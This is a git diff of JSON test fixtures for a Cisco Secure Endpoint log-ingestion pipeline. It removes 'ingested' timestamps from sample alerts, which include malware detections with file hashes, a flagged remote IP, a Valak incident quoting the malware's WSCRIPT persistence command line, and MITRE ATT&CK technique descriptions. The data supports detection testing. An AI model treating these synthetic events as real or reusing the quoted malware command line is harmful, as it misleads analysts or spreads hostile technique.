Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}", "severity": 1, @@ -3941,7 +3895,6 @@ "action": "Policy Update", "code": "553648130", "id": "6525498672153625000", - "ingested": "2022-02-02T05:52:16.386335086Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 @@ -4005,7 +3958,6 @@ "action": "Scan Completed, No Detections", "code": "554696715", "id": "6525494703603843000", - "ingested": "2022-02-02T05:52:16.386336054Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}", "severity": 0 @@ -4064,7 +4016,6 @@ "action": "Scan Started", "code": "554696714", "id": "6525494527510184000", - "ingested": "2022-02-02T05:52:16.386337068Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}", "severity": 0 diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json index 95133cef5be..02872ce9e46 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json @@ -86,7 +86,6 @@ "event": { "action": "SecureX Threat Hunting Incident", "code": "1107296344", - "ingested": "2022-02-02T05:52:24.688944674Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n - Review all activity performed by the user\\r\\n - Upload any suspicious files to ThreatGrid for analysis\\r\\n - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}", "severity": 4 @@ -186,7 +185,6 @@ ], "code": "1090519054", "id": "6180352115244794000", - "ingested": "2022-02-02T05:52:24.688947538Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 2 @@ -289,7 +287,6 @@ ], "code": "1090519054", "id": "6180351977805840000", - "ingested": "2022-02-02T05:52:24.688948581Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 2 @@ -388,7 +385,6 @@ ], "code": "1090519054", "id": "6159258594551267000", - "ingested": "2022-02-02T05:52:24.688949419Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -489,7 +485,6 @@ "action": "DFC Threat Detected", "code": "1090519084", "id": "6180341055704007000", - "ingested": "2022-02-02T05:52:24.688950235Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 3 @@ -597,7 +592,6 @@ "action": "DFC Threat Detected", "code": "1090519084", "id": "6180341055704007000", - "ingested": "2022-02-02T05:52:24.688951044Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 3 @@ -705,7 +699,6 @@ "action": "DFC Threat Detected", "code": "1090519084", "id": "6180341055704007000", - "ingested": "2022-02-02T05:52:24.688951881Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat 